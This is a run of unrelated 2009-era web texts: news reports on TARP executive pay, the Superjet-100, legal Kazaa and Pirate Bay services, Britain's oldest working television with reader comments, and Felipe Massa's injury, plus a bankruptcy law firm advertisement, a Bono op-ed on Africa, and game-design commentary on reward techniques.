The only semblance of pay restraint will be applied to the seven companies that have borrowed more than once under the TARP program : Bank of America , Citibank , American International Group , General Motors , Chrysler , GMAC and Chrysler Financial .
These seven companies must have the pay and bonuses of their top 25 executives approved by a “ special master ” appointed by Geithner , who named prominent Washington lawyer Kenneth Feinberg to the post .
Feinberg will also review compensation practices at the other 80 firms that have drawn TARP money , but will not have any decision - making authority over them .
While Feinberg was immediately dubbed the “ czar ” of executive pay by the press , there is a revealing contrast between his background and record and that of the individual who functions as the Treasury ’s automobile “ czar , ” hedge fund billionaire Steven Rattner .
Feinberg was most recently the head of the fund established to compensate the families of those killed and maimed in the 9/11 terrorist attacks in New York City and Washington DC .
His task was to distribute several billion dollars to the families with a display of fairness and sensitivity .
A critical purpose of these charitable payments was to forestall any lawsuits that could bring to light facts about the events leading up to September 11 , 2001 , above all the role of US intelligence agencies , which the government would prefer to keep hidden .
Rattner is a capitalist speculator .
He has a great deal of experience in dismembering troubled companies and disposing of their assets , extracting the maximum profit from a process that involves the destruction of jobs , pensions and working class communities , a task which he is undertaking with great zeal against the auto workers .
The class divisions in American society are thus demonstrated even in the contrasting personal styles of the two “ czars . ”
The CEOs of giant companies are to be treated with tact and discretion .
The auto workers , on the other hand , are getting the treatment dished out by a corporate raider .
The pretense of restraint on executive pay comes only a week after a report , by Challenger , Gray & Christmas , that more than half of American companies are cutting or freezing pay for their employees in response to the financial crisis .
Some 52.4 percent of human resource executives surveyed in May said their companies had cut compensation , up from 27.2 percent in a similar survey in January .
The proportion of companies taking cost - cutting measures of all kinds declined slightly from January ( 92 percent ) to May ( 86 percent ) , with most companies enacting a combination of job cuts , hiring freezes , furloughs , pay cuts and benefit cuts .
It is undoubtedly the case that those CEOs who proceed most aggressively to cut workers ’ pay , benefits and jobs will reap the reward personally , in the form of large bonuses .
And according to Geithner and the Obama administration , they will have earned it by their superior “ performance . ”
The Obama administration is a right - wing capitalist government pursuing a deliberate and sweeping attack on the American working class .
Its social program finds its clearest class expression in this dichotomy : foreswearing any limits on CEO and executive compensation , while demanding sacrifices by workers and an across - the - board cut in “ consumption ” — i.e. , in the living standards of working people .
Photo : www.blog.flightstory.net
A Russian new generation Superjet - 100 aircraft successfully made its first long - distance flight on Wednesday , Russian news agencies said .
Two Superjet - 100 aircrafts , 001 and 003 , left Novosibirsk early in the morning and covered the 3,000 kilometers ’ distance to Gromov 's aircraft testing institute in Zhukovsky , near Moscow .
The Sukhoi Superjet - 100 regional jet family is often described as the " hope " of Russian aviation .
The 75 to 95 - seat aircraft was the first to be designed and produced in Russia after the collapse of the Soviet Union .
The Superjet - 100 is intended to compete against the Antonov An - 148 , Embraer E- Jets and the Bombardier CSeries programs , and is said to have 10 - 15 percent lower operation costs and be more comfortable than its competitors .
Investment into the project of Superjet - 100 development is estimated at $ 1.4 billion .
The Melbourne Recital Center and adjacent Melbourne Theater Company is amongst the most visually progressive works we ’ve seen in recent history .
It comes as no surprise to learn that these future - forward buildings have been honored with the 2009 Victorian Architecture Medal , a prestigious honor for firms like Ashton Raggatt McDougal who designed these .
While the exterior of the Melbourne Theater Company buildings focuses on form much moreso than function , the heart of these state - of - the - art theaters is rooted in sound acoustic principles .
Outside , bright neon - styled beams wrap around these buildings in a skeletal fashion , while behind it flourescent streaks and dark metal frames give the buildings strength .
The theaters themselves are a sight to behold .
One theater is a continuation of the vivid , fluorescent exterior– it ’s black setting and pink magenta character wrap around a central stage with an unabashed style .
The next theater features a breathtaking , natural texture of driftwood that encases the walls in a symmetrical but organic design .
We certainly would n’t mind catching a few shows in these auditoriums , and are officially jealous of the theater fans in Melbourne , Australia who can attend these buildings at will .
TheCoolist hereby salutes the brilliant work of Ashton Raggatt McDougal .
May your phones continue to ring with new prospects for exhibiting your creative vision .
[ ARM architects via thecoolhunter ]
Illegal peer - to - peer file sharing is still rife on the net Peer - to - peer download sites Kazaa and The Pirate Bay are set to return with a new , legal subscription model .
Kazaa , shut down by a $ 150 m ( £ 91 m ) lawsuit in 2006 , will be reincarnated as an unlimited download service with a fixed monthly subscription rate .
The Pirate Bay has outlined a " give and take " model which pays users for sharing their resources .
The Swedish software firm that owns The Pirate Bay said the service would be free for a majority of users .
Both services are following the example set by Napster , which was the subject of several lawsuits that eventually shut down and bankrupted the service .
It re-launched in 2008 as the largest online retailer that did not restrict use of its content with so - called digital rights management ( DRM ) software .
DRM restricts what people can do with the songs they buy .
Now , the two heirs to the Napster - driven peer - to - peer downloading throne have entered into a legal trading arena to compete with two very different business models .
Pricing structures Kazaa is expected to launch in the US this week as a monthly subscription service , costing $ 20 ( £ 12 ) per month for unlimited downloads .
It will issue songs in the Windows Media format , with DRM that will restrict use of downloaded content to five computers or devices .
The Pirate Bay , once the largest illegal download site on the web , was acquired by Swedish software firm Global Gaming Factory X after the original owners were found guilty of abetting violation of copyright law .
Last week , it hired Wayne Rosso - a former president of P2P site Grokster and founder of P2P site Mashboxx - to help strike deals and refine the new business model .
The site 's new incarnation is expected to launch in August , and the firm is developing plans to charge a monthly fee to use the service .
That fee would be reduced if users shared their downloaded content or allowed the service to utilise the storage space on their computers .
" For the great majority it will be free of charge , for a minority it will actually make them money , and for a small portion it will cost them , " Hans Pandeya , chief executive of Global Gaming Factory X , told the AP news agency .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
ENJOY LIFE AGAIN
Central Valley California Bankruptcy Attorney
We know that dealing with financial burdens can take a huge toll on you and your family .
Harassing phone calls , letters , and even emails from creditors might have made you afraid of answering the phone or checking your mail ; this is no way to live !
You deserve to go about your life without the constant fear of financial destruction .
We Are Here To Help Submit
Thanks for submitting !
Considering Bankruptcy ?
You Have Options
Most people considering bankruptcy will look at two options .
Chapter 7 or Chapter 13 of the Bankruptcy Code provide the most common paths to financial relief .
Your unique financial situation , the property you own , your income , and the types of debt you have will be among the most important factors in making the right decision between the two chapters .
When you come in for a free consultation , your financial picture will be carefully considered and a plan will be laid out step by step through discharge .
You ’ll leave confident in the choice you ’ve made and know exactly what to do next and when to do it .
We take the guess work out of the process so you can start enjoying life again .
Call now to set up your free consultation .
Learn More Chapter 7 Chapter 13 You Can Afford Bankruptcy
Our exceptional bankruptcy services really are affordable .
We offer flat rate fees for each type of bankruptcy and unique circumstance .
The flat rate fee quoted will take care of representation through discharge .
You can be assured there will be no hidden costs or fees .
Simple , Easy Payment Plans Coming up with the retainer fee all at once is sometimes difficult .
We offer simple , easy payment plans through the pre-filing phase of the process .
Once you are paid in full , we will immediately work to complete the petition and set an appointment for your review and signature .
9 Myths About Filing Bankruptcy in California DOWNLOAD YOUR FREE eBOOK !
ENTER YOUR EMAIL TO Request Now Let 's Get It Done Today !
Feel free to answer your phone again without wondering if an obnoxious bill collector is on the other end .
It ’s time to stop lying awake at night worrying about all that debt .
Reach out to us now and start enjoying life again .
We ’re available to take your call 24 hours a day , 7 days a week .
CALL US AT : 559.495.1529 Submit
Thanks for submitting !
Why Hire Us ?
Your Customized Plan
Does it seem like there ’s a form for you to fill out for just about everything in life ?
Not here .
A friendly member of our team will assist you in gathering all the information we need to help you through the process of receiving bankruptcy relief .
Using the information we gather , a customized plan will be created to suit your unique circumstances .
You ’ll take away a blue print that describes the steps that will be taken to lead you through the entire process until discharge .
It ’s just one more way we give you peace of mind .
" The staff was friendly and helpful .
I also really appreciated how they gave me regular updates on the progress of my case . " ​ ​ ​ - Pedro C .
I would highly recommend Jerry to anyone .
He took his time with us , care about our well being and made sure we were informed every step of the way .
It was an absolute pleasure dealing with him .
Great job !
​ - Jeff C .
" I felt like I could trust Jerry from the first time we met .
He really helped our family .
I ca n’t recommend him enough . " ​ ​ ​ - Thahn H .
The Right California Bankruptcy Firm
Your property and financial stability are too important to leave to chance .
You need an attorney you can depend on to navigate complex bankruptcy laws , rules and procedures .
Mr. Lowe and his legal team have the experience and understanding to help you make one of the most important decisions in your life right now .
They are committed to providing you with exceptional service and timely answers to your questions .
After consulting with Mr. Lowe , you will have confidence in the decision you ’ve made and peace of mind , knowing it ’s the right one for your family .
Reach out to us 24 hours a day , 7 days a week .
Committed To Bankruptcy Matters
Our passion is helping people like you obtain relief from oppressive debt and to start enjoying life again .
Our focus on bankruptcy matters over the past seven years has given us valuable knowledge and experience you need on your side .
We look forward to showing you how our commitment to staying current on everything bankruptcy allows us to offer you exceptional legal counsel .
We ’re Always Here For You
Chances are , we ’ll be the ones contacting you with timely updates on your case .
But if you have questions or need assistance , a friendly member of our team is always ready to take your call 24 hours a day , 7 days a week .
By Rory Cellan- Jones
Technology correspondent , BBC News
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement Britain's oldest working television has been tracked down in a house in London .
The 1936 Marconiphone is thought to have been made in the months that Britain 's first " high - definition " television service began .
The set belongs to Jeffrey Borinsky , an electrical engineer and collector of antique television and radio sets .
He bought the set , which has a 12 - inch ( 30 cm ) screen from another collector 10 years ago and is still working on restoring it to its original state .
The screen is mounted inside a wooden cabinet .
The image from the cathode ray tube , mounted vertically inside the cabinet , is reflected onto a mirror .
The few controls include volume and vertical hold , but there is no channel changer , as there was only one channel when it was made : the BBC .
Modern in part
The set appears to be in good condition , but Mr Borinsky aims to replace a number of modern components with originals .
" The cabinet was beautifully restored by the previous owner , " he explained , ' but my aim is to gradually restore its electronics to its true 1936 magnificence , " he said .
Marconi also made the " Instantaneous Television Camera " shown in 1936
But the Marconiphone 702 still works as a modern television .
It has been hooked up to a Freeview box so that it can show digital channels , although Mr Borinsky has had to install a standards converter so that a modern television signal can be seen .
Mr Borinsky only keeps the set turned on up to two hours at a time , and he uses it to view films from the 1930s and 1940s .
He says he enjoys watching the kind of pictures that might have been seen by the original owners .
The National Media Museum in Bradford has a similar set , but does not use it to show television pictures for fear of damaging it .
Iain Logie Baird , the curator of television at the museum , said it is a thrill to see the Marconiphone working .
" It 's very exciting to see the image the way people would have seen it in 1936 , before television became ubiquitous as it is today , " he said .
Mr Logie Baird , grandson of the television pioneer John Logie Baird , says this set would have been of huge local interest when it was first acquired at a cost of 60 guineas - the equivalent of £ 11,000 today .
" Television was a very exciting thing , it was something that the whole neighbourhood would come over to watch .
People would crowd into the home of the owner . "
The set was discovered as the result of a competition run by Digital UK , the body overseeing the switch to digital television .
The aim was to publicise the message that just about any television , however old , can be used to show digital channels .
I HAVE A NATIONAL MICROWAVE OVEN BOUGHT ON 14TH NOVEMBER 1982 WHICH IS STILL IN DAILY USE AND APPEARS TO BE IN NEW CONDITION
ORVIN HILL , MALVERN , WORCS , ENGLAND
I still have an alarm clock in the shape of a hen which I bought in Dhahran Saudi Arabia during the first gulf War in 1990 .
This thing has survived many house moves and has a habit of clucking in my suitcase on long trips ...
Paul Elvey , Cologne , Germany I have a 1972 boiler .
It has over the years become slower to start up and it normally takes a bit of planning before getting it going .
The process is normally over in a second so does not put it under to much pressure .
It still works but makes a hell of a noise when doing that or anything else .......
A good whinge at me normally livens it up !
Gary Yandle , Milton Keynes , Bedfordshire
We have numerous old items that we cannot and will not throw away just beacase they are old , including : 1960 's kenwood Mixer , 1950 's Goblin teasmade , 1890's wall clock , 1920 's mantle clock , numerous 1980 's computers , 1980 Ferguson Video Star VCR which we trust more than our DVD recorder to work , 1979 Sanyo hifi system
When you see what people throw away just because of aesthetic reasons it makes me sad and I scour the local recycle site for a tv or some rejected piece of technology and rescue it more often than not .
Use it till it breaks , then repair it till it breaks again is my motto .
Nick Blackburn , Douglas , Isle of Man I have a portable spin drier bought on 31st January , 1959 at a cost of 12 and a half guineas plus £ 3 . 13 . 0 for purchase tax .
It still works and is in occasional use today
ORVIN HILL , malvern , worcs , england I still use , on a daily basis , a kitchen gas range , circa 1947 .
My grandparents bought it new , and it has been in the house since then .
Jeff Dahn , United States
I still have a pocket tv from 1980's .
It works great especially if you watch it in the dark .
You dont see pocket tv these days .
I like scary movies .
KEVIN JORDAN , MANSFIELD 1974 Grundig Party Boy Radio still in use , 1979 JVC Dolby Tape Deck still in use , 1979 Kenwood Chef still in use , 1981 Hoover Vacuum cleaner still in use , 1983 Sharp Microwave still in use , 1985 Ferguson Videostar VHS recorder still in use
Sara , Reading
The oldest appliance I have is a Hi Fi pre and power amplifier designed in 1967 by British manufacturer Quad .
It is still in daily use and is used for stereo music and DVD soundtrack listening .
The reason I still use it ?
It was built to last and the sound is far superior than modern equivalents , is more reliable and can still be repaired by the original manufacturer in Cambridge .
Mark Bramley , Orpington , UK I too , like Adrian Furnell , have a Panasonic Combi .
Microwave / oven / grill that has worked without fail since the day I bought it back in 1987 .
I will be very sad when its obsolescence date finally kicks in .
Lynne Davies ,
The Hague , Netherlands a chip cutter , it 's ancient and gigantic , people are amazed that it was once thought of as a ' mod con ' . from the 1920s .
t , vancouver bc canada I have a mid 1960 's N4408 Stereo philips reel to reel tape recorder .
I 'm still half way through restoring it , and have found an ebay seller with spares for it .
I also have a pair of 1969 celestion Ditton 15's .
Back then they cost £ 109.99 !
In todays money thats ~£ 750 .
Moving on to the 70's I have a 3.5 hp 2 stroke fly now , which needs a new ignition coil and the blades sharoening , but still in good condition .
I also have a Dual CS505 - 2 turntable from the late 70's , and a Rotel Ra-820 from the same timeframe .
Moving on again I have a stihl strimmer from the mid 80's .
I also have a Philips toaster from the same timeframe , still with its original aluminium cable !
Also from the mid 80's we have 2 sony trinton tvs .
Bejamin Bloomfield , St. Albans , Hertfordshire
My grandfather started building radio receivers in 1916 .
I have what appears to be a triode and base from that time period , as well as some transformers and other components and 5 boxes of miscellaneous valves ( tubes ) from various time periods .
I have a working Philco " Superheterodyne 9 " ( model 90 ) floor model radio .
My oldest non-electronic piece is a Columbia " Grafonola " phonograph which my grandfather bought as a wedding surprise for his first wife in 1918 .
Tom Draughon , Ashland , WI , USA 1962 electrolux refrigerator with recipe book and original receipt of sale use it to cool drinks , in perfect working order
alan kirby , nottingham england
My oldest home entertainment appliance is a 1902 Gramophone Company " Style 3 " gramophone .
It plays 7 - inch records and would 've cost 3 guineas when new .
It still works but the spring motor 's a bit weak now .
My next oldest is an Edison " Fireside " phonograph from about 1909 / 10 .
This is in lovely working order and plays 2 and 4 minute cylinder records .
Gavin Mist , York , UK I have a 1964 Hofner Committee hollow - body archtop guitar .
Still plays like a dream .
Trouble is I play like a nightmare ...
Nick Pinder , Hedon , East Yorkshire I concur with other comments about the durability of old electronics .
I had a keen interest in electronics as a teenager , and a friend of my brother gave me an old radio set which had been collecting dust in his grandmother 's attic for decades , to see if I could repair it .
From the size and appearance of the thing , I 'd say it dated from no later than the 1920s .
I gave it a good clean , performed a few basic wiring checks and then , fingers crossed , turned it on .
To everyone 's astonishment , it still worked , and could pick up and play LW and MW AM stations !
The fancy DAB radios of today will not last as long ; I 've read that modern microchips only have a working life of around 10 years before they ' burn out ' !
Steve Denton , London , UK
My grandfather ( mum 's uncle ) has possession of my mum's TV set , a Phillips television set bought in 1976 ..its B/W , has a 24 inch screen and still works ( manual buttons and 8 channels ) .
It still works and when it does n't , we give it a physical slap or kick -- that does the trick .. and it runs again !!!
Mun , Bangladesh
Perhaps the oldest is the sewing machine , the last all metal moving parts machine made by Singer , in the early sixties .
However , we still have a Hoover vacuum , from the same era .
Our TV is only about 20 yrs. old .
Perhaps the most disproportionate item , in age vs. cost , are the autos .
Rarely now , does an auto operate for more than 5 yrs. , without major repairs , in spite of the fact the average auto now costs $ 28,000 dollars .
Autos are the worst cost to value ratio item , in the household .
No wonder people have stopped buying them .
Rick McDaniel , Lewisville , TX USA
The oldest appliance I have in my home that still works is a 1933 Crosley 148 Cathedral stile five tube Radio .
After 75 years I can still tune in what 's left of the AM band here in america .
Shawn Schwartz , Grand Rapids , Michigan ; United States Of America I have ( or have been passed down to ) the following : Cinerex 707 Dual projector ( around 1970 ) Vic 20 computer ( 1979 ) Commodore 64 computer ( 1982 ) 1970s TV game machine I 'm a bit of a technology hoarder to be honest , and also have assorted mixing equipment , an 8 track cartridge player and others .
One particular classic no longer with us was a BT laptop from the 1980s that weighed as much as a desktop PC .
My favourite of all my wonderful classic items is however a 1976 12 string acoustic guitar !
Christian Cawley , Redcar , England
We still have a working Panasonic Microwave and Grill bought way back in 1988 ( approx ) .
Still used every day and in excellent working order !
An identical one was in the Ideal Home exhibition last year ( 2008 ) in the Household appliances from the 1980 's section as being an ' antique ' !
Adrian Furnell , Fareham , Hampshire Our family has a Sony 14 " colour TV from the early 80's .
Made in Japan .
It was our only TV .
It still gives a great picture but the channel cannot be changed and it turns off after a few minutes .
Imran Chaudhry , West End , Hampshire
When i was teenager in the early 70's I was employed as an apprentice TV engineer and went to an old ladies house in Birmingham and found one of these models .
I and the engineer were flabbergasted .
The owner of the shop I worked for also had one of the Logie Baird contraptions gathering dust in an attic store room .
Robin Tigrx , Cambridge I have a round electric fire circa 1960 , similar to one thrown into the bath , killing a baddie , by James Bond in Goldfinger or was it From Russia With Love .
I also have in daily use a 1979 Toshiba Rack Stereo System and a 1983 Tricity Microwave .
My Computer is 6 months old ... honest
Geoff , Taunton , England British build Metrosound ST40 amplifier complete with Whalfdale Tritten speakers purchased 1974 from Lasky's in the Tottenham Court Rd on a day on which I bunked off school .
It started its life with a Garrard record deck and now is fed MP3 from a laptop .
Trevor Ashenden , Orpington , Kent I have a Bush radio of the 1950s which was working with good quality tone until one of the large valves went some years ago .
Sylvia Lee , Marple , Stockport , Cheshire A VEF Riga Minox sub- miniature camera from 1939 and still going strong today .
This model was the first generation of the tiny slide - in / slide - out ( to advance the film and cock the shutter ) ' spy ' cameras popularised in one or two of the early James Bond movies and still made to this day .
Fabulous engineering .
Pev , Dover I have an Alba radio purchased in 1954 .
It was given to me by my parents as a birthday present and travelled with me all over the world .
It still works although there are no stations transmitting on MW or LW .. just SW .
Jim Currie , Funchal , Portugal I have a Ronson electric razor still working although the on / off switch needs replacing my Mother bought it for me on my 17th birthday that is 53 years ago
Joe Bennett , Leyland
The oldest appliance I have at home is a tube radio , a Philips 462a built in 1946 .
It is a magnificent radio , with it 's glass " floating " dial , and it still works .
I love the " warm " sound only tube valves can provide , and I also love the 40's 50's and 60's design .
Marcos López , London , UK I have a Kenwood Chef mixer that I bought in the early 60's and it is still in regular use .
I have the blender and potato peeler attachments with it but I do n't use the peeler .
It has the whisk , dough hook and K beater .
Joan Archer , Jameston , Pembrokeshire , Wales Celestion Ditton 44 Loudspeakers Version 1 . built in 1972 .
Perfect working order .
Dan , Worcester
There is an ECKO TV in our attic that was bought for the coronation in 1953 it was working until the transmitter was turned off it has a radio in it as well .
I also have a Murphy radio from 1938 / 9 that was working up to being stored in the mid 90's .
My earliest memory was dad listening to the battle of the River Plate commentary , I understand the same model was used at Bletchley Park .
Dad was a crack Morse reader and spent hours listening to transmissions during the war .
Robin Kenworthy , Staplehurst Venusian theodolite with tripod , 2309 , currently stored in my gazebo .
Roceci , Cardiff , UK A still working , and in regular use , Hoover Constellation vacuum cleaner which is at least 40 years old .
Jack Dawsey , Colwall , England I have a Philips reel - to - reel tape recorder that I bought in 1966 .
It 's not in 100 % perfect condition ( you ca n't get spares for it any more ) but it does still record and play .
Unfortunately , magnetic tapes were n't intended to last 43 years and some of the really old ones have deteriorated and have a tendency to break if played !
David , Reading , UK
My parents still use the toaster that they were given as a wedding present in 1958 .
Dad has replaced the cable a couple of times , and it still works perfectly .
Adrienne , London
It 's not in the same league as this TV but I bought a digital radio / cassette alarm clock in 1988 with my first wage packet .
I am still using it .
21 years in the digital age is n't bad .
Michelle Cooper , Dover , Kent I have a 1950 Bush TV22 .
It 's in my garage in Marlow .
I have n't turned it on since 405 line transmissions stopped .
As a teenager in the 60's I attempted to use it as an oscilloscope but a switch put back to a TV .
I use to watch That Was The Week That Was on it , with my headphones without my parents knowing .
David Keeble , Sheffield Oldest appliance in our house ?
Husbandi Domesticari ... unit brief indicates that unit should be capable of working alone .
Is marginally self - starting , needs verbal initiative on occasions .
All parts still functioning .
Tends to leave additional bits around the house during work periods .
Is not self - cleaning .
R Wells , Lichfield , Staffordshire
This brings back memories .
My father bought one before WW2 , and I remember watching it when the TV service started up again after the war .
I also remember the excitement when it was replaced by a set with a front - facing screen , so that we no longer needed to crouch in order to pick up the mirror image .
I never realised that it was such an expensive luxury !
David Wingate , London , UK I have a 1926 ( approx ) Siemens Excel copper electric kettle .
It 's beautiful and worked the last time I tried it .
Interestingly , it has a concealed element - just shows how the wheel of technology turns !
John Peedle , Yeovil , England I have a Sinclair ZX Spectrum in perfect working order complete with the original manuals and styrofoam packaging , as well as a few tapes of games .
Also still have the original cabels to connect it to any tape recorder / player .
Stephen Jeffrey , Glasgow , UK I 've got a Sony Titron portable colour TV in a wooden case it was bought about 37 yrs ago and still has a great picture but is currently out of use as one of the switches needs to be fixed .
Diane Dark , Swansea
My computer is so old it came with Windows Millennium Edition .
I bought it as long ago as 2001 .
Do I win five pounds ?
David Young , Wroclaw , Poland Philco domed radio - black Bakelite - bought 1936 - was my grandparents ' - original and working perfectly .
John Puddifoot , Leamington Spa I own a bush DAC90A LW / MW Radio ( valve ) and a bush SRG91 Valve stereo radio gram .
Both are in working order .
I had to learn Valve electronics in order to keep them in working order .
I do not know the age of the LW / MW radio but I do know my father bought the radio gram in 1963 .
We still have the original user 's manual !
Mark Streete , Worthing , West Sussex Hoover vacuum cleaner c. 1953 .
Stored in the loft and non-working .
Identical to the model displayed in the National History Museum at St. Fagan's , Cardiff .
Jeff Brooks , Newport , Gwent , Wales I have a Danset record player purchased in 1955 / 56 .
has been in storage for the last 40 years .
Any idea of its likely value ?
David Percival , Reading , Berks I have a stereo , nearly 30 years old , only the radio still works but I keep it for the brilliant sound quality .
Same for my dad only his is nearer 50 years old .
Could n't possibly afford anything so good now ; please do n't switch off the analogue signal !
Kay Taylor , Warwick 1920's / 1930 's toaster .
Opens on both sides to reveal bare elements akin to a open electric fire .
The finger holds of the side flaps that fold down to enable bread to be clamped to each side are made of Bakelite .
Worked last time we dug it out .
In loft out of harms way .
Sue , near Marlow , England My Mother who , at 87 years old still works very well
Pete , Wallasey , Wirral
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
BEIJING 
Five days of talks aimed at bringing China and the United States closer together on the issue of climate change did not yield substantial progress , according to a Congressional delegation that met with environmental officials and the country ’s top leaders this week .
During a news conference on Thursday night , Nancy Pelosi , the speaker of House , said she was “ hopeful ” after meeting with a number of officials , including President Hu Jintao and Prime Minister Wen Jiabao .
But Representative F. James Sensenbrenner , a Wisconsin Republican who took part , said he was discouraged by the Chinese refusal to commit to greater cuts in greenhouse gases while insisting that developed nations do more to reduce their emissions .
“ It ’s business as usual for China , ” said Mr. Sensenbrenner , the ranking Republican on the House Select Committee for Energy Independence and Global Warming .
“ The message that I received was that China was going to do it their way regardless of what the rest of the world negotiates in Copenhagen . ”
Trailer for Shutter Island .
From Oscar - winning director Martin Scorsese , Shutter Island is the story of two U.S. marshals , Teddy Daniels ( Leonardo DiCaprio ) and Chuck Aule ( Mark Ruffalo ) , who are summoned to a remote and barren island off the coast of Massachusetts to investigate the mysterious disappearance of a murderess from the island 's fortress - like hospital for the criminally insane .
BUDAPEST ( Reuters ) - Injured Formula
One driver Felipe Massa could walk out of a Budapest hospital within 10 days and his eye appears to have suffered no damage in Saturday ’s accident , his doctors said Tuesday .
Slideshow ( 13 images )
“ My expectation is that he would walk out of the hospital on his own , ” Peter Bazso , the medical director of the AEK hospital , told public television M1 Tuesday .
“ If his recovery continues at this pace , I would n’t rule out that he could leave within 10 days . ”
The Ferrari driver ’s condition remained serious , however , Bazso said .
“ I would like to point out that although he ’s recovering , this is not the end of the story ; he is still in a life - threatening condition .
Of course , the danger is decreasing by the day . ”
Dino Altmann , Massa ’s personal physician said the Brazilian was alert and his eyesight , a chief concern , was fine .
“ Today Felipe is improving continuously , he is more alert than he was before , ” Altmann told reporters .
“ He ’s answering in three different languages in proper answers and he knows exactly what ’s right and left ... his left eye has no problem , his eyesight is okay , ” Altmann told reporters .
Massa , last year ’s world championship runner - up , fractured his skull in an accident during qualifying for the Hungarian Grand Prix when he was hit just above his left eye by a bouncing spring , weighing almost a kilo , that broke free from compatriot Rubens Barrichello ’s Brawn car .
Ferrari team boss Stefano Domenicali , who visited the hospital Tuesday , declined to discuss who could replace Massa and said the team awaited his return .
“ We said that we were waiting for him as soon as he will be back and that ’s his car , ” Domenicali told reporters .
Doctors brought Massa , 28 , out of an artificial coma on Monday and took him off a respirator .
Bazso said it was too early to predict whether Massa had suffered any lasting damage .
I ’ve played that tune .
I ’ve talked of tragedy , of emergency .
And it is an emergency when almost 2,000 children in Africa a day die of a mosquito bite ; this kind of hemorrhaging of human capital is not something we can accept as normal .
Image Bono Credit ...
Deirdre O'Callaghan
But as the example of Ghana makes clear , that ’s only one chord .
Amid poverty and disease are opportunities for investment and growth  investment and growth that wo n’t eliminate overnight the need for assistance , much as we and Africans yearn for it to end , but that in time can build roads , schools and power grids and propel commerce to the point where aid is replaced by trade pacts , business deals and home - grown income .
President Obama can hasten that day .
He knows change wo n’t come easily .
Corruption stalks Africa ’s reformers .
“ If you fight corruption , it fights you back , ” a former Nigerian anti-corruption official has said .
From his bully pulpit , the president can take aim at the bullies .
Without accountability  no opportunity .
If that ’s not a maxim , it ought to be .
It ’s a truism , anyway .
The work of the American government ’s Millennium Challenge Corporation is founded on that principle , even if it does n’t put it that bluntly .
United States aid dollars increasingly go to countries that use them and do n’t blow them .
Ghana is one .
There ’s a growing number of others .
That ’s thanks to Africans like John Githongo , the former anticorruption chief of Kenya  a hero of mine who is pioneering a new brand of bottom - up accountability .
Efforts like his , which are taking place across the continent , deserve more support .
The presidential kind .
Then there ’s Nigeria ’s moral and financial fist  Ngozi Okonjo - Iweala , a managing director of the World Bank and the country ’s former finance minister  who is on a quest to help African countries recover stolen assets looted by corrupt officials .
And the Extractive Industries Transparency Initiative , which is helping countries like Ghana clean up the oil , gas and mining business , to make sure that profits do n’t wind up in the hands of kleptocrats .
Presidential attention would be a shot in the arm for these efforts  an infusion of moral and political amino acids that , by the way , will make aid dollars go further .
That should be welcome news to the Group of 8 leaders gathered in Italy to whom Mr. Obama bids a Hawaii - via - Chicago - inflected “ arrivederci , ” as he leaves for Africa .
By xfennec , Sunday 17 September 2006 @ 17:22 :: News
As promised , I 'm proud to present you a new track : " Rally " .
This is the first " non-procedural " track for ManiaDrive .
This track was designed and created by Glaby , and I would like to thank him a lot for allowing us to use his great work !
Have a look to his website to see more about his work .
This new track is available in the " Internet Tracks " menu of the game , under the name " rally " .
Since the track ( and textures ) will be downloaded , you may have to wait a few minutes the first time you 'll try to play this track .
Have fun and huge thanks to you for supporting the game !
Boston 's storied Fenway Park will host the 2009 Winter Classic , the NHL announced Wednesday at the 97 - year - old ballpark .
The hometown Boston Bruins will face the Philadelphia Flyers for the annual event on Jan. 1 , 2010 .
In what NHL commissioner Gary Bettman called " the worst - kept secret " in the NHL , Fenway Park had been rumoured to be the next destination for the hugely popular hockey event since the last one was played on New Year 's Day at Wrigley Field in Chicago .
" In a very short time the Winter Classic has become a hallmark event of the NHL regular season , " Bettman said .
" Our fans have turned the Winter Classic into a time to celebrate … our game itself .
" It 's great for the growth our sport . "
" Last year a reporter from the USA Today commented that being selected for this event is like being awarded the NHL 's version of the Olympic bid , " Bruins owner Jeremy Jacobs added .
" He had it right .
" It is [ our fans ' ] passion for the Bruins that have made this possible . "
Almost 49,000 fans saw the hometown Blackhawks lose to the Detroit Red Wings , and a year before that the Pittsburgh Penguins beat the host Buffalo Sabres in front of 71,000 at Ralph Wilson Stadium .
The Winter Classic has turned out to be a boon to the NHL , especially in the United States , where broadcaster NBC garnered an average of 4.4 million viewers throughout the 2009 game .
That was the most since a Philadelphia Flyers - New York Rangers game on Feb. 23 , 1975 , according to Nielsen Media Research .
Bettman also announced that the league and American network NBC reached an agreement to extend their TV contract through to the 2010 - 11 season .
NBC has been broadcasting NHL games since 2006 .
Many game developers are starting to find that games with illusory challenges sell better than those with real challenge .
They believe that what gamers want most is an experience that conveys the feeling of accomplishing a difficult task , but without the difficulty .
Games like this have spawned a new genre of simplified ' parody ' games that highlight the techniques used to provide this illusion of accomplishment .
What I find interesting about these parody games is that they are actually fun -- the design techniques are still effective even in a satirical context .
Here are some examples of parody games .
Click the titles or pictures to try them !
When I finished this game , I felt a real sense of accomplishment , even though it was a ridiculously trivial task .
This shows the effectiveness of the standard ' quest ' pattern : tell the players exactly what to do , let them do it , and then reward them for doing it .
This game uses a funny song as a reward , but there are many other possible rewards .
If you finish a quest in an RPG , an NPC thanks you , new story options are unlocked , you gain experience points , and you get new items .
Psychological studies have shown that random reward schedules are usually the most effective , so it 's no coincidence that you see them in the most addictive games .
For example , every enemy or container in Diablo is like a piata -- there is a random chance that it will drop something good if you click on it .
This combines with the sunk cost fallacy very effectively .
Once you 've killed three enemies looking for a rare item , you can't stop now ... you have to keep going until you get it !
Many games use well - designed rewards to convince players that they 've accomplished something important , even when they 've only completed a trivial task ( like burning the rope ) .
' Achievements ' are one of the newest techniques to add gameplay goals and rewards with minimal development effort .
The developer can just think of arbitrary goals , and reward the player with an achievement alert whenever he reaches one of these goals .
Achievement Unlocked takes this idea to its logical extreme -- there are achievements for everything you do , and your only goal is to get all of them .
Achievement Unlocked is a fun game because it uses achievements for humorous effect , and to guide players gently from trivial tasks to more difficult ones .
However , it does n't actually capture the real purpose of achievements : replay value and platform reinforcement .
Achievements provide ' replay value ' because once the player completes the game , missed achievements provide an incentive to come back and go through it again , carefully getting all of the achievements .
Developers care about replay value because every hour the player spends playing the game is free advertising to all of the player 's friends .
Achievements help reinforce the platform ( such as Steam or XBox 360 ) because players have a platform - specific list of all the achievements they 've unlocked , which they can show to all their friends .
